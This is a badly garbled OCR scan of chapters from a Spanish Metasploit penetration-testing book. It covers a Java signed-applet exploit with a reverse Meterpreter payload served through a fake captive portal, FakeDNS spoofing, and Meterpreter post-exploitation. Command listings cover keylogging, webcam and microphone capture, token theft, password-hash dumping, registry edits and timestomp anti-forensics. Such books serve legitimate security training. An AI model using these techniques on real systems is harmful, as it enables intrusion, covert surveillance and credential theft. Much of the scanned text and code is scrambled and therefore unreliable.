siguiente cédio: OCT HEL PUBLIC ™=//¥C//O00 HTML. 3.2/E"> “eriTusocaptive Fortalé/tTLe> sve Portal che /> Gheript types*tent/Garascript">windov.ocation = “tty: //au. apple. cow: 8060/ portal” c/euripe> ere00rss Netopot para Pemener Emule del applet de java se conigua con tos valores que se especifican en la siguiete aba, Valor Parmetro SRVHOST | 192.168:061 (JP atacante) SRVPORT | $080 (puerto escucha servicio) URIPATH | jportal peo PAYLOAD | Windows/neterpreterioverse — Tab 0 Conia io ple Sr reise lnutlizacion del servido Apache y uli direstasn ul de pple pew onli iar Siegen li soa nn te para hacer mas ereible el ataque. SET seré estudiado mis adelante en el fibro. ma fat Bonny Takeda > aze"exlol male oro SC ‘exploit (java_signed applet) > show options on Ve eplon (pelt au /orover/ave signe, ape: fone caret Setting Required oeserpton ‘AUMLETRAME Sitetoader yes The sain applets class pane, era Yee Gale or te cere, am ae Ie Tweal hor to Usten oe. Ts mst be a adress 0 Sr ie Yor The taal port to Listen on Se fatae Be egetfte $8. tor lianog omnectioe Sstversion $3 8 —_Seciy'te version of SL Sta shuld be aed facet jed: SSt2, SSL3. TLS) eae : aera ‘utr @__The Wr toe for tls exploit tient is rane i334: Congo erpliaitomsaom signed apie i felteccién de la web del portal cautivo hacia el servicio web montado por el médulo de ‘Metasploit se visaliza en el nave Mepis *gador de la victima mediante fa aparcibn del applet y la carga de ‘ef uato acpi el eundro de dilog del applet se produce la ecucién dl payload provocando a obtencisn de una sesidn inversa por parte del audioroalacante, be mac Ota serra aaa Co) Cees i335: Caio de dle apis i Capitulo 1. El arte deta intrusion i ay a ag TTY TaD AF 51 Seth karte a0 a feerpeler selon 1 ened (90Gb 8-8:4%4 > 192,268,0.10:100) at 2912-66-28 2: th:4 ‘expoitjrasignedaylet) > sessions -1 tive sessions | ne tote iste LsA44d > 192.108.6,209:19/0 Fig 3.367 Oncaea dl ple Fake DNS por José Selvi snciew ina mejor a este médulo. FateDNS ba sdo muy iio por nen ws aos y ropa wa ms # ee ml Ta cua reine se ve fa en 2 specs, a gia ys kn, Jos seh desta un ‘enamorado de Metasploit, debido a su Nexibilidad y potencial, FakoDNS se encuentra en fa ru ppentestlesploitsframework3/modules/auxiiaryserverfakedns.rb. eligiese que dominio se spoofea 0 alo p/m pneeres201203Ingernd aed‘, Jost alae cone Tuncions FakeDNS y como él ha mjorado este mul. El cio original se pucde vs eontinucin, tity potential dasain exceptions "1 flmslecbypese Sint-each do Ten? "if (name.to_s <=> ex) = 0 ‘ressive tne exception donain sors farlew geass) 5 ME erin ates (°OS bypass domain found: 1 ‘print_status ("DNS bypass domain I{ex} resolved 11ip]") on request sds_snawer(nawe, 60, answer}eee Fn el cbdigo exist un punto en que se recore la sta de dominios que dehen ser saltados ala hora de Frlsear la respuesta DNS. Mediante el bucie que se vo en el eéligo se compara la peticién DNS eon ‘os elementos de a fsta DOMAINBYPASS, $alguno son igales entonees se cealiza una resoluessn ‘onal, mientras ques tas reorer a ist y compara ls elementos no se ha encontada ningun ‘gual se envia la respuesta fake ‘ie equiore cambiar el comportamento del DNS se pod pense en una sein tp como es ‘naalica ef primer if por la siguiente linea if (name fo_s <=> ex) = 0. Con esta sole nombve solicit se encuente ent lista se resolverd con jae y cuan no fo estéfuneinnard orm. Sélo ene una iitaciény es que en ia variable DOMAINBYPASS slo se pdr congue ‘un mombre de dominio, y no ands, a soluci anterior puede ayudar en un momento dado de una mitra, pero cuando se fe introduce ut sombre de dominio que ne existe, el meésdulo deja de fncionar y se vompe, Para solucions este Drbloms, se debe afadir un control de excepciones en la zona de eéigo en In ys se rsica el Procesa de resolcién, begin {ip = Resoly: :DM3.now)getaddzess fname) -to_¢ fanavee = Regolu: DNS: :Resouroe!sINssa nowt Ip sve ssBxception => Cant content implementado se evita gue cuando se intent resolver un wombs de dominio que no Exist el malo seroma, Per, segin Jos, sigue siendo una solucién un tanto especial, aunque si s fanconat Para inalizar eon una solucién elegant y ecient, José Selvi implementé su propia vesin de FakeDNs a i que denominé BestFakeDNS, Ia cual se puede descargar esd el siguiente enlace ‘inpoos penesteresfakedns. Esta versin est basade en ta criginal del jromework, pero sc han fad fanciontidadesinteresantes: ‘a variable TARGETACTION con ta que se evita modificar a mano ei cédiga y permite ‘tslbjar con a léuicaoriginol ia logice modifionds. Este parimetro se pele defini somo BYPASS, cl DNS resolvert todo excepto lo que se quieraspofecr, FAKE, el cual falsears "ds las peticiones menos las especifcadas en a lista DOMAINBYPASS, «Control de errores el cual evita que Ta aplicacién eaiga ante fa petcin de un nombre de ‘dominio que no existe. 7 «Lista miltiple que permite configurar varios nombres de dominio en tals tanlo en moulo 8YPASS come en modo PAKE. J jqldeard. Se miede definie nombres de dominio con wildcards, por ejemplo * infiratica64.com, Capitulo WU. E? arte de ta intrusion EE 7, Personalizacién y actualizacin del framework Una caracteristica interesanie de Metasploit es la Hlexibildad y facilidad ce actualizacién del framework. Los usuarios saben que Ia seguridad informatica es une de las ramas que més avanza, ‘ya que pricticamente a diario salen gran cantidad de vulnerabilidaes conocides. Es por esto'ue el auditor debe disponer de su framework lo més actualizado posible y a da, para que en los test 4 intrsin que haga uso de Metasploit Este pueda sacar el méximo provecho de los sistemas informations a tos que se enfrenta, 1 ropoion n messmo de adulizacinaomdico ment x dl crud rst Someone snc cn sere Mepis wf UL ie retapitcomy rela cont lead ayaa vere cn ea screen y exit ners eit, enor cde, 8 existe acne proces desig lee reso pute ono pm ane emo. [+1 stenting towne the metnlolt Foner SEETELIS S eon og, mm egrprin: dawn 4:6 7c Tees e8 BaP sage cee sea fas eae emeaaumet eo SASrat crs mapas San RAE acmererson ig: Ateslcn aon on milan ‘Como se ha mencionado anterirmente en este libro, existeun gran problems con ls actuligaciones| aulomitieas y es que se piende el canirol sobre lo que se estéreslizando en el framework, Poe ejemplo, si actualmente ve actualiza Metasploit, en su version libre, se perder In oad aifopin i est de intrasin. spor elo, que en muchas aniopin y no pods ser uslzada por el suitor en el test de intrsign, Es pores ; ‘casiones se recomienda el uso dela actualizacién manuel y de mascra convolada. dems, en el proceso de actualizacin también se descargan archivos para mejorar la estailidd del framework, Actualizaci6n controlada de recursos Ata exploits worasfuncionalidades a Metayploit es realmente sensillo si se conoce sw estructura ‘Como se ha mencionado anteriormente en et libro, Merasploitdispone de una serie de dtectoios ‘otganizadas dénde se recogen los exploits, encoders, payloads, herenientasaxliares como pueden sor ls escéneres,etesera. Para atadir un exploit que se haya deseargado de Internet, simplemente hay que afar el fchero con extensin 1, Ruby, en la carpetaexplit que se encuentra en la ruta / peitesvexploitsframework’/moduls. Como nota aii, que los exploits que se descarguen deben estar esoritos para Metgpleit.| 92 | Metasploit pora Pentesters Una vex se disponga de esto claro, el autor puede personalzar su entomno y sus ruta dénde ‘encontrar sus exploits 4 su antojo. Por ejemplo, si el auditor quiere una earpeta denominada ‘MisExploits que contenga todos los exploits que él requiera, una buena préctica seria crear esta campeta en lara pentes/expoitfrumework3/nodules/esplots, dle esta manera cuando e auditor quiera acceder desde msjconsole al contenido de ese directorio, simplemente deberd ejecutar use exploit MisEsplotsy elegic el fcheso que se equiers carga 0 ullza Para el reo de componeutes y méduls este proceso es similar y pucde ser Hevade a eabo de manera andloga, Ejemplo: Descarga de exploit y adicién al framework Para el sgueate ejemplo se deseargct ut exploit del sto web hup/espioi-dbcom, que se eneuenire exci en Ruby prepardo para Metasploc Después, se eopiaa expt at comet dine seguir ear ty oder aga con el rumen Fn primec lugar se accede al sito web y se busca el exploit equerdo, se puede hacer uso del buseedor ‘ue viene incomporado en el sitio através de su URL fp: /fvwneexploit-db.com/search, Una vee se localice el exploit requerdo para leva a cabo el proceso de explolacién se debe descargar al equipo, en principio sobre cualquier ruta. Hay que tener en cuenta que el exploit esti preparado para ser ullzado por el framework ae Malte etre: ig 33: Daag deep Capitulo Il El are de ta intusién Una vee que se dispone del fchero con extensin 1b, se debe alojr en une cula que cuelgue de lt de los exploits, es decir, la rata /pentesvexploits framework i/naduleslexploits, Ey esta rula se pueden crear otros directorios 0 alojar el exploit en alguna ya exstente. Para exe ejemplo 8° ‘rear una nuova carpeta en It ruta comentada anteriormente cuyo nombre sec Miéxplo. Tras i ‘desearge del explo! se ha denominada flashariehurusion.rb al filer que To catiene. Ese fiche dleberé ser copiado © movido a la ruta /pentesfexploitsframeworKAinodulesiexplous/itxplot, reciealemente crea. fee /onlanse 6 /ystet/ealaits(tempenamilesexplaitsi€olelt/ ia st cricnrnmnaomatarattmta | ihiteemeariteeble ogasitte 8 Fig]: Ai dwn elie wa la de Mea * Una vez que se dispone de los nuevos explut en ls ruts, y sls estn prepara se debe aan Lframevvork para poder interactuae con ellos. Tras lanzar msjeonsolese uiliza el comando use Pars cargar el meiuto wilizando ta ruta dénde se alojaflashartelnirusionr. Como se puede observe cen a siguiene imagen es bastante seacilloe intuitivo la adicin de expos y su organizacién en eh Framework, mediante el uso de directors. Sage ela ‘pss ilatitestunon > sha pionslo IV. Meterpreter & Post-Explofation Capitulo TV Meterpreter & Post-Explotation 1, Ambito [EI presente capitulo se cenen en el smbito de I pon-explotaeiéin unde as fases ms deiendas del (est de inizusién, Bn esta fase of auditor puede obtener gran cantidad de informacion sobre el estado de ura red de una maquina oinciuso, poder obtener acceso a znas Jondc ants nase podiaaccedery ‘En imuchas ocasiones se quire llegar a zonas de la ed desde las que wn auditor, en el estado actual ro puede lograr acceso, Pero si es certo que el auditor puede demostar ala oreanizacién que est, siendo audiiada, que tener un mal dsefio de red, « no elimitarcoreclamente los accesos a Zonas de la red sensibles, pueden prowocar acoesos no autorizados. En muchas ocasiones estos accesost 10 se realzan decane dese la mquina que diypone el ait, y ia través de mauinas con, ‘menor peso en la oreanizacién, Ins cuales proporcionan conectivdad con zonas mis sensibles de la red, Inclus, puede que las miquinas comentadas aneriormente compartan eredenciles com Ins _dquinas mis importantes, un grave error de seguridad que sin deda el auditor podré aprovechar para impersonalizat Lapost-explotacién es por tanto una de las Fases comprendidas en un test de intusi6n y fa eval debe ser procesads de manera minuciosa, En esa fase el auditor recoplar informacién reat del escenario, satiliaaad como intermediacio una maquina vulnerada en la fase aleriog, la fase de explotacén, En dcha fase seindicaba que la eleecin del poyload es una accin eitica ya que las funcionalidades ‘que se podran realizar despues de ogra a explotacién dependion de ést. En algunas ocasiones no, se necestan muchas fincionalidades y si una en concreto. Mientes que en otras ocasiones lograr {ener un control completo sobre f2 maquina vctima puede ayudar, y mucho, en fs fase de post- explotacin Cuando se dispone de acceso Fisico a una méiquina, uno de los payfood mas interesantes que se puede ejecutar es alguno que proporcione una esalada de privileios en Ia misma, No es necesario ‘montar un Meterpreter, el cual se estudiar mas adelante, para simplemente elevarprivilegos “También hay que recalcar queen muchas otras ocasiones se necesita é¢ payloadt como Meterpreter para poder disponer de un control total sobre la méquina vietima. Pro no s6lo wn conto otal sobre J maquina vulnerada, sino aproveckar esa situacién para controlar el entomo de dicho equipo.= Maple para Penesters Para poder ilustrar esta iltima sentenia se propone un escenario como el siguiente: ~ Bl auditor dispone de conectvided con una maquina con sistema operative Microsoft Windows XP vulnerable y posee también los explaits necesatios para conseguir acceso ~ El auditor no dspone de conectvidad directa con una miquina con sistema operative ‘Microsoft Windows Server 2008, Eatonces, | sudiorno puede auiar aprior dicha maquina + Fl sistema operative que utiliza el auditor no es relevant, pero se supone que es ue Aisteibucign BackTrack = Lamiquina con Windows XP si dispone de conetividad cow ta niquina Windows Server 2008, Si el auditor vutnera la maquina con Window X? dispone de al mene conectividad con ei equipo Windows Server 2008. & pari de vse momento se puede audilare intentar lograr acceso a dicha ‘miquina, Como se vert més adelante se pueden probar distnlas leaicas para conseguir dicha accidn. La impersonalizacién de usuarios o técnica come el pivoting uyuan y mucho al auditor en este tipo do escenaras. En cesimen, la fase de post-exploracié es tan extensa como importante en un tet de intrusion, Bl ‘auditor debe tener en cuenta cuales el objetivo o las objetivos y entonces realizar una planifcacibn Pata lograréstas. Conocer ef escenato es importante y en esta fase se consigue mis informacién sobre el escenario real det que se dispone. 2. Comandbos bisicos de Meterpreter -Meterpreter es un payload disponible para Metasploit con el que se puede realizar casi toda accién imaginable. Meterpreterapora una consola linea de eomandos propia con sus comandos ineluidos. Ademés, puede ejecutar sus popios serpts lo cual hace que aurente la potencia y posibitidaes que offece Meterpreter. Tanbin se pueden cargar médulos que aportan funcionaldades exira con los ‘que los usuarios pueden realizar mis acciones, Se pueden desarollar scripts y aadiros al framework de manera sencilla. Este hecho dota a ‘Meterpreter de exibilida y la posiilidad de aumeotar las funcionalidades que el payload aporta a los usuarios. Bs realmente dificil enumerar das ls acciones que se pueden realizar con Meterpreer, cl aleance de a imaginacién del usuario es realmente importante La téenica que se utiliza para ejecutar un Meterpreter en una maquina vulnerada es la inyeceidn en ‘memoria de DLLs en fos procesos en ejeeucn del equipo vulnerado, Después de explotatelequipa ‘vulnerable secargandichas DLLs en el proceso vulneada y se obliene waa inte intutiva de linea 4 comands. Generslmente, Meterpreter migea de un proceso a ato para evitar que el cierto fa ‘aida del proceso vulnerable haga caer la conexid con la mquina atacante Capitulo I. Meterpreter & Post-Esploation i Los comandos prepios de Meerpreter se estucturan en tres calegorias principales que soa las siguientes + Cove comma = Stdapi + Priv ‘Core commands . Los comandos de tipo niteo permite realizar distntasfuncione bisicas en lasesidn en fa maquina ‘remota, El objetivo de eslos comands es el de ejecutar scripts, earyer méduls interact cont la riguina remota. En fa imagen se pede visualizar el istado completo de los comandos de tipo nuclev, Mis adelante je estudiar las dstintas acciones que se pueden cealizar con ellos agrupédose por tipos de funeionaldades que prosentan, Description ‘ Rectan te caret Sochground Reigraonds the caren session Wa rma tere jist Ute rung balground seripts Son Erecrten'naterpreter scripts a backgroud threat dome lsslvs iaforon aout active duels cic” Glei"s catet ont Seine te neterpeeter session tay ets en Tn laplye inforation about ros nlule Fcrct Tere te cet in Oroy inte iro seeipting ape tous taal ne or aoe neterpreter extensions aigrate gate the server to another proces, que” Tefunate ste acterprter session fad teats tts fron re festurce ‘Rm te commnds tare. in fie na Eccites a aetrpreter script Or Post aoiule oe Deprected alias for “Yu Stice___wlter ate tae chet i401: Lista de cone common de Men ‘Comandos para la ejecucién en segundo plano iste varios comands que permien al usaro ejecta script de Meterpreter en segulo plano. El comando bgil permite al usuario elminac un sript de Meterpreter que se et cjecutndo. tt ‘comando dgls permite isla los scrips de Meterpreter que se estin eecutando actulmeate, y por ‘kino el comando bgram permite ejecutar un script de Meterpreter en segundo plano.Metso para Penesters Hay que tener en cuenta i existencis del comando backround) el cual pecmite dejar ln eosin de ‘Melerpreter en segundo plano y volver a a interaccin con J intetfar, de Meuspiolr que so esté ‘ubtizane', por ejemplo, msfconsote 9 mse In imagen se puede visualizar como se ejecula un scrpr denominado heylogrecordr et cual Desmite realizar aptura de las pulsaciones de teclado de la miquina vuletada, Se pede visnali ‘omno seus ls dstintos comands para fistar los trabajos en segundo plano y Fnaliznivs TELE» tg eyloqrecorder 1 rected Weterpreter with 3b 20 2 fcteraeies > (41 "explorer.exe Process found, algating into 1728 | FV tigratien SeccessFutt| | i Starting the heystroke sniffer. Keystrokes belng saved in to froct/.ns3/logs/scripts/keylogrecorer/192.160.57 201208281 heteracier > wpist [ach 2 [heplagrecoders) fetecareter > bylist Fig 42: Gen de Bakgrond common Bjecuciones y cargas ara realizar ejecuciones de serio cangar médulos que proporcionen nueva funcionatdedes 4 Aeterreler w incluso ejecuar las Ficheros de extensiin RC para avlomatizar areas ge pueden ‘liza iatintcs comandes, Pcomindo re se encuentran esuso yes equivalent al comando load con el que se pueden ait Gluos pars Meterpreter. El comand resource permite ejcutar archivos le aulomatizai, lot {mnocids por lt extensén RC. Uno de los eomandas ms importants es ran ya qu permite ejecuar lessens de Meterpreter, Estos srios son una de ls partes més importantes del errant pot ‘od a Tineiontidad gue aportan ye constante desarrollo de és pal comunidad, Comandos de ayuda {Los eomancns de ayuda einformaciéi de los que dispone Meterprelr son los sigiens ;,, lel. cual muestra informacién de wso del comand del que se require informacién ‘oeasiones no se enoyensa disponible ayuda del comand através de ep, e por eli que ‘iy que efseutar ef comand del que se requiere informacion con el paréinetro active El comando ? proporciona una aya similar ala del comand help. Interaccién y uso de canales Eveomando exeeue no es un comando de tipo niclo © core command. pero se uiliza para eeculsr ‘wna aplcacion en tx miquina vulnerada, es decir en el equipo renoto, Como se puede visnalizay en Capitulo IK. Meterpreter & Post-Explotation D ta iteagen, con este comiando se pueden ejecuta aplicaciones en fe maquina remota. ste comande so explicaré mis sdelant, Una vex que ieterpreter ha ejécutado un proceso en la mAuina rem se puede interactuar con <éte irav6s cle fa nea de comandos. Por ejemplo, eon el comando execute se he lazado ua cm In qin remota y como se a ejeutado exert con el panes ~c ha ereado wm cael poy que se podréinferaetuar con dicho proceso, : El comando chame! permite conocer fos canales que se enuesran activos, e incluso eon los Dusfmetros~Fy--w es posible lee asada del procesn coresponcientey ecribiren dicho proceso El comando read es equivalents a uiizar la insruccién channel ~t mientras que el eomando write es compatible con I insiueeiin chanel -w Rea Taree Seka we cues yee 1 Sep proces en 18 ots toe rest Wino (esi 5.1.2688) fc copyig aban mira cop, woos. jsuceter > ite 2 Fer abs atwed ty © * ona eapty ts Fig 4.0 Inerecn coal eal rnd on vo ro, lcomando itera permite interetvar con el proceso ejecutado en ht maquina remota, simplemente infizeno el identendor de cna que hay aberto cone proceso remot, En el caso del proceso, «nidexe abort antriormentese debe ejecular la instrucién interac para pode esribit en Ta tinea de comandos romata, Stdapi ‘se io de comandos permite al usuario realizar accones comune, que cualquier suai puede cjecutaren el sislera opeitivo ae ulan, sore el sistema operative de In miquinarenoie risen dtnas extegortes de comandos de tipo sda que sa la seteF100 | Mees pra Penesters = File System Commands, Los comendos del sistema de archivos perniten al alacante 0 ‘uditor realizar operaciones sobre os archivos tanto remotas cone locales, = Neeworking Commands. Los comandos de ved permite al isuacio realizar consuias y gestion os dispositivas de od dela méquin remot, = Spslem Commands. Los comandos de sistema permiten gestivnat recursos del sistema. = User Interfece Commands. Los comondos de imerfiz ce usuario permiten realizar ‘scciones sobre el escrtorio,caplra de pusaciones de estado, eaplura de panalia cel iempo dle inatividad del sistema = Webcam Commands. Estos comandos permiten grabar del miesatono del equipo remota si lo hubiera, listar las webcams disponibles en la miquina remote 6, incluso, realizar Fotografias de ta vetma coa la webcam, File System Commands lstado de comandos para realizar operaciones sobre el sistema de activo, lank lee como remota se puede viualizar en i siguiente imagen, 4 a Id the cotents of «fie to the scien & ‘hog airetery a. Delete the soecltid ste Momteat —outanl 9 fle er directory ci eine tie Gettin warklogaieerory tar ‘ge eal ekg rectory twa ‘oro alector fate oe diretory he Prine warn retary i Gelete the spelt ite ‘sie eave Sreetry Stary —_Searen for tee Ghat fie oF destory igh Lisado de lesson common e Masia, ‘dad indicar que los comandos clisicos de GNU/Linux esti disponibles para! sstema ‘emoto. Bs decir, la ejecucién de is, que es un comando no vlido en Windows, provoca la obtencién ‘el listo Ue erchivos deta miquina Windows vulnerada, tay que dstacar los comandos upload y download con los que se puede subir un archivo 9 ly sviquina vulnerade y descargar un archivo de la méquina victima. Como se puede visulizar en la {nagea siguiente la sintaxs de estos commandos es reelmeste sencilla, ‘También es inferesaute ver los comandos rm, mii, rds edit que son icilmenteentendlibles, ‘comando search permite realizar bisquedss de fichesos en el equipo remolo. Search dispone de Capitulo 1. Melerpreter & Post-Explolaion _ENS parimetros pss afinar las bsquedas, por ejemplo con el pardietro fe pueden busca paves de Ficheros, con el parfmelro~d se pueden realizar bisquedas de directorios unidades, teen, Selma tat FETStaaing trace Ir] wad): stack at evi ‘caval ft EXGUNEE tat frances 2) ig 405% Soi y dscns de arene ala ni ube, Networking Commands Tistado de conan para eliza as gations de ed se puede visualizes jinsacibn, inp reg anak ig 406 Lin de amon pr pia de eleoe Mae Fl eomando roe permit vsualizar y manipula las entradas del abla de ras det equipo remoto. Por otro indo, el comand ipconfig permite visualzar la configuracién de red de Ia maquina remota, {ul eomando poryfvd peemite realizar port forwarding sobre la muna vulnerada System Commands {remands estema son einen ites ines Sn dla cond de Meteprter ‘mds ullizados por los usuarios ys que proporcionan gestin del sistoua vulnerad. A continuacion se puede visualizarun listado de los eomandos de sistema de Meterpreer ate Gee? SESE semen si Se TEE a ee ere eee Se Se eet Fee este eum mm ew sso esas aa 2 ig: Lisa de comands sistean de MeterMetasploit para Pemesters {as mands Tializadas ela palabra fen apoan Ia postilded de splat la identnd do ev sso servicio, Et oman stal_tofen permit cambiar la identi rvés Gel Pid ey Prvcus, 9 sinies 6 sencilla steal foken , y de esta manera se adguiete le identi dn erases ul, Para volvera a identded anterior se dipone del mao chop taen sor Secure se vuelve a a identidad previa, Para conocer la tentidad que se dispone en wn momenta reas ts iar omando geri. Oo comands relacionados son epi con cles ve roceao en cl qu s est eecutando la esd de 3icterprerren ve inte, y Ss pueile volver ata ideotided anterior, por fost funcfonaid es similar ad wes ily bs pemitneininar proceso ques etn ejeewond ena mndquina remota y Drncesos con gran cantdad de detalle, entre toda esta informacicm ofa dstaca el PIS. {ens nvesos, Ors comands a ener encueia sn ebony shuudotn uc permite cic ‘agar Is nquina remota respectivamente, Fear oporons una extutra pare pode nersctuar cone esto de la mqioa nae [a stale reg .A coninuacién se expenifcan los tinned comands que recibe re: - me Sehtmber. Bae comando cnumera o fst el contenido de un ciave concrete, Como ‘iemplo se presenta siguiente instruecin: rep numley-& HKALAdlSaptvone, «Cres. Cea wt clove en ened ges ees Crm val se yea reg creatckey -k HKCUWhacked. 2 - vee ‘eletcke Blisina clave comespondente con la ruta que se indique en! parnet i Como ejemplo se presen la siguiente insruci: ey delteke -F KC hector ‘Queryolass Consulta el tipo de la clave ia int Asta un vlora una clave del registro, Ua ejemplo seria: eg servalue kK ‘narked —» nombred valarDeDatas “en eet 5 lta Const! vr dun eno de un clave del egi. Un lompl serie: queryeal -& HKCUWhacked —v nombre, . ern “ Cop TE Meterprete Pot Bxpoion P03] User Interface Commands ‘L06 comandes de interaceién con Ia interfaz de usuario proporcicnan al atscante Ia posibilidad or ton ropes del cers, eel el pop oemn wi Con natal de se "sles caands pen evils on gee ge : ah sem ear ie Econ | kiss? ss Seca enc ston Lak SAS i inno de om pars estos intern earn de Meter abe destacarel comand iaetime con el que se puede consultr el empo de inctiviad del sistema per parte de la vicina, es decir, el iempo que I vrtma leva sin eliza su sistem, ‘Los comandos que empiczan por keyscaproporsionsn control sobre el teed de Ivete, Cor 1 comand feyscan_stor’ se empiezan 2 capurar las pulsaciones de teclado del equipo valnerad, ‘nents que con keywcar_stop se dejan de eapturardchas pulsacianes. El comando Keyscan_ dump liga a Meterpreter a realizar wn voleado del buffer donde estén contenidas jas pulsciones en ln engquinavitiva, ‘Con el comand screenshot se ebviene ana eapturs de pantalla de la méqvina de ly vilima.. E archive resultant es descargado automiticemente por Meterpretery alojado en ‘a carpeta dnd se ‘ad ejeculando Merasplot, por ejemplo aot/ ip Webcam Commands {Las comands toy de tipo webcam son sy vistosos ya que ealizan aciones sobre el miceéfono yl webcam de ue equine vulnerado. Estado dle comandas se puede visvstzara continu [tants webc Camnnes camand——_peseription fecord alc Record audie tram the defoult icrophone far X sects stem Uist List ‘etena_snap Take 8 srapthat fran the specified eon "ig tad: concessions on cl mln y webu, El comando record_mise dispone de varios parimetros interesanes. Bl parimetro —d indice _nimero de segundos que se prabarin en Ia méquina remote, hay que ener en cuenta que por defecto 6 1 segundo, Bl pardmetro~f india en qué rta de la méquina del acante, es decir la ruta local seMcp pore Petters tnacenr pain. pret -p in aon ecu. ‘ras la grabacién, por defecto viene activado, " hive de audio Bt conan wlan fi pritesblrer un do es wei Cu msl de wet dpb ea nig Pe xc de int ot eb ina ea en eba.snp con bevel og ea en Bt sasaeureccee a ardimetros que aportan funcionalidad at comando, 7 Priv Las comandos de} nl priv proporcionan funionais par el : 7 ncoaides par iver pve, manipie ifocnacién este que uo selina porn aaa eae y eer alna ne a cot a manpusin cher SAM, Seer econ Monge etsysten Aten to elevate your privilege to that of local syste. 1 ly: Fassord database Coons Comand © ascription ‘sine Gags the contents of the SH ctabase rv Tnestoep Comands fomoes beariptiee Lunestonp__sonpalate Fie MCE attributes ig 4.10 Listdo de omnis de lo pre El mduto se divide en wes calegoras, que permiten realizar diversas acciones. Dichascategrias ~ Elevate Commands. Realizaelevaciones de privilegios en el sistema vulnerado, + Password Database Commands, Obtieneinforaacién sobre usuarios y eontraseias. ~ Timestomp Commands. Realiza Ia manipulacién dels stcibutos de los archives, Elevate Commands El comando getsysiem permite realizar intentos para eleva privilegiosenel sistema vulnerado. Con sistemas Windows XP se conseguick realizar esta operativa de manera sencilla, pero si el usuario Se encuenta con Windows 7 a elevacion de pivilegios supone un relo mayor, el cual se ved m: res Ptvilegios supone wn reto mayor, el cual is Copiuo W. Metepreter & Pst Eplocation A (stemreier > gee erver serene; PRGIAS-768EC\Aminstrator fctenaster > getsystes got systen (ve tethlgee 2) > getuie ever iserone: ME ATORITY SSN petzineeter ig. Eleva do pave cn sans Wino JP nr Password Database Commands El comando hasan ofece la posibiidad de obtener los hashes y ssuatis que se eacuontean et ¢l sistema. Como se vera inés adelante esta informacion e importante cuando se reuiere liza le impersonalizacion de usuarios, 0: 4738172c3a7ectaadsbaasbsi4sees 512099905997 cssstscafoc 396969 10g0:317440357ea2ds490c6749cd7e877792:elec best (42020999194 (28799650::: Fig Vcd de uric yates de nSAML ‘Timestomp Commands El comando timestonp permite manipula los atibuts de un fchere de sistema vulnerado, ;Con 4ué fin? Principalmeatc, se busca realizar un antforenies con el que las pists dejadas en el equipo queden confusase incongruenes El comando implementa gran varedad de opciones ques listan a coatinuacin: = Modificacin delim acceso Parallevara cabo esa accion se debe ejecuar a siguiente instruecin tnestomp a "12/22/1986 2:12:34" formato de fh ‘aentr comillasy tiene dos campos, el primer esl fecha con el formato MM/DDIYYYY, Yel segundo esl hora con formato HH:MM:SS, ~ Feclide creacdn del archivo. Se pede moar la fecha de reac del archivo través dela siguiente insrwecidn fimesionp -e “12/22/1986 13:05:57" ~ Fecha de modifcacién, Se puede modifiar esta fecha con In siguiente instruccién imestomp -2 "12/22/1986 22:34:54" = Viswlizacién de los stributos. Para. visualizar los atibulos de wn Fichero del equipo ‘emoo se ejcuta a siguiente instrccion restomp x = Para ejecutar una operacin sobre los aributos de un directorio de manera recursive se Aispone de la siguiente insteucei6n imestomyp +rated Te set apie ICE ean > tines ies + Ton-a-38 age: fie 2 tinestoxp sack tet on "2/229 I setting specific met aeribites an cahac Etat > inestom cba tet¥ ulnlet » esto cick tt Metaploit para Pentesters. ze soon eae) ane cr > Uaestow achat 2/59/986 12B tribes on ciback et eae ae tase ig: Meili de aibus de hers ene oq nan, 3. Seripts de Meterpreter Existen gran cantidad de serpts que se pueden ejecntar por Meterpreter en la maquina vulnerada & avs de! eomando run, Para conocer que sripis hay disponibles en un ssion de eterno Se debe esriit el comando rum y mediante el uso del tabulador pra astocrmpletar se mestrord to ‘mensaje con tous las posibildaes que se disponen, islet > woe tay 31 oS possiblities? se scar rete ect ann Sst gen Sings im plieate crane Weve Terefe wn htop on users fro etn: powers en fs ext Fis in Bea yarn) un fite attector oh ge app eatien ise get en fn getleasLtn ereds Fin get aco sets rn getge in getter fan getvneye fn fash Fon testedee fn teyegeecarder a Altay ‘zs isda 0 it spon enn ses eres Algnnos scripts realizan funcionaidades similares a las de algunos comsndes camentados anteriormente. En est apartado ge estudiar k yin fase de post-eplonacin, 'os que se consideran mis interesante para e auditor Covinlo W_Meterreter & Posr-Expltaton F107 ‘Los script son desarrtlados por la comunidad, To que hace que existan gran canidad de ellos Algunos se pueden obtener mediante subversion y otto es obligatoro hacerlo de manera mana En la ruta /pentesexplotsframewurk@lsriptneterpreter se disvone de eran canta de seripi® te ete payload ten especial. Los scrips que vienen con Mast depende de la vein que sm ‘oblenga del producto y las actualiznciones que vayen surpiendo deéste winenum: cl informador Este serit es el mis completo para la recoptaci6n de informacion de te maquina vulneradal ‘Los resultados se almacenan en la miguina del atacante en la ruta /raotdansf/lgsterips, 0 si el {framework esl versién 4 la ruta seria /rootd mfi/logs/sripts. : wien realaa nonierosas aciones, entre las que destacan lanaar gran canta de nes define ‘de comancos y de ocdenes de WM!, obtener un stad de aplicaciones que se encentceninstaladan ‘en fa miquina vuinerada, realizar wn volcado de los hashes de ta mdquina, obtener un listado def tokens, tetera, [Petes wntns ct emmein ner sere $y geen pret et 4 grimmett» ser eto tec lt cmt et t/t 9 ei uns 9» vrai. 1 sain Cone List si ran ad vie I+) Smig cxnand et I ns Ht es rt} ‘a ‘meg ons ges elspopes ‘ent ar yc ‘ning ‘Set Tcaamyaminitraers i test rat poop nnd eters ‘hr ean et Wi om Shy estan te Fre hae contig fet cen art oe Han Fig 15: lewd oer ina, La ejecuciin de weinemum proporciona gran canidad de archivos como se puede viswalizar en 'a imagen, Esta informacién se almacena en Ia rule /vot/ansfSlogyscriptsvinenum/-p , Despes, simpleme ae is wo opleacion que soporte pratocoto de Tela para conecare con dicho weve % conwsets. Por iim, comenar que se genera un sero! par linia a accion de ereaibe ta ave eleual esti lsponibe en la ruta/rot/ms/Mogstcriplgetclnetlean up. . Copitula IK, Mererpreter & Pos Fig 419: Const mine esertoca emo as mina vir, v ierm mediante el uso del eseritorio remoto, se Yor timo y una ver raianda a accién que se require mediante os ‘a proceder a a elminacién automat del usuario y ala desactvacién del servici de exritvio, moto. De este mov, se evils Kevanar sospecus y ve dj ef ste ene esto en et que se encntraba desl un principio, gu, se cred autométicamente Cuando schabiltéel servicio de escritorio remoto a través del scrip get, r um sript de atomatiasin en fa aa rood! mflogetcripetgilean_up_ recon {que se automatiza la accién de deshabilitar el servicio y fe eliminacion del usuario, Pa +e Fee To ea Ta A Te [fc seating fot 